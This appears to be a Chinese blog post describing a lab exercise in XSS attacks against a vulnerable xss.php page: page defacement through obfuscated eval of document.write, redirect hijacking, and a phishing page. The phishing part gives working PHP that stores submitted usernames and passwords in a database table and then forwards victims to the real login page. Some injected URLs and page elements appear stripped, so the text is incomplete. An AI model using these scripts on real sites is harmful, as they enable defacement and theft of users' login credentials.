基于XSS的网页篡改,网页劫持,网页钓鱼

基于XSS的网页篡改,网页劫持,网页钓鱼

192.168.80.174服务器上存在漏洞页面xss.php
192.168.80.160服务器上有调用的js
xss.php:


浏览器地址栏构建简单的反射型xss判断是否存在xss

http://192.168.80.174/xss.php?op=

基于XSS的网页篡改,网页劫持,网页钓鱼_第1张图片可以利用,开始实验。

网页篡改

tamper.js:

var  ss = '
'; eval("do"+"cu"+"ment.wr"+"ite('"+ss+"');");

浏览器地址栏构建:

192.168.80.174/xss.php?op=

基于XSS的网页篡改,网页劫持,网页钓鱼_第2张图片浏览器地址栏url不变,页面变为百度首页。

网页劫持

hijacking2-1.js:

setTimeout(window.location.href="https://baidu.com",500)

浏览器地址栏构建:

192.168.80.174/xss.php?op=

基于XSS的网页篡改,网页劫持,网页钓鱼_第3张图片

网页钓鱼

延申:xss窃取用户cookie
构建钓鱼页面,最简单的就是把目标登录页面爬下来,修改表单action值为恶意数据操作页面。
这里我的思路是数据分流,让用户输入的登录信息流向两个地方,一个是恶意数据操作页面,一个是真正的登录页面实现正规登录操作,没成功就换了个思路,先流向恶意数据操作页面然后再跳转到正确的登录页面。
钓鱼logon.php登录口代码:

前端js:


jxpt.php

ErrorDirectory Listing Denied
query("SET NAMES utf8");
$sql = "insert into fish(userID,passwd) values('".$_POST['IPT_LOGINUSERNAME']."','".$_POST['IPT_LOGINPASSWORD']."')";
if (mysqli_query($mysqli, $sql)) {
} else {
	echo "500";
} 
?>

Server internal error

please check your network and log back in after 3 seconds //这里的url自行更改

利用前面的网页篡改,把钓鱼网页加载出来,这里我直接访问它
基于XSS的网页篡改,网页劫持,网页钓鱼_第4张图片
填好信息点击登录,jxpt.php存储数据并跳转页面到正确的登录页面:
基于XSS的网页篡改,网页劫持,网页钓鱼_第5张图片基于XSS的网页篡改,网页劫持,网页钓鱼_第6张图片用户登录信息被记录:
基于XSS的网页篡改,网页劫持,网页钓鱼_第7张图片
如果嫌在jxpt.php页面停留太长可以把content中的3改为0



隐藏公网ip和url,杜绝恶意攻击。
分享我所学。

你可能感兴趣的:(web渗透测试)